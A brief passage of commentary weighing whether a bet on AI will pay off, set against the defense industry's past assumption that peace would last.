Maybe AI gets good enough, and the bet pays off. Maybe it doesn’t. The defense industry thought peace would last forever, too.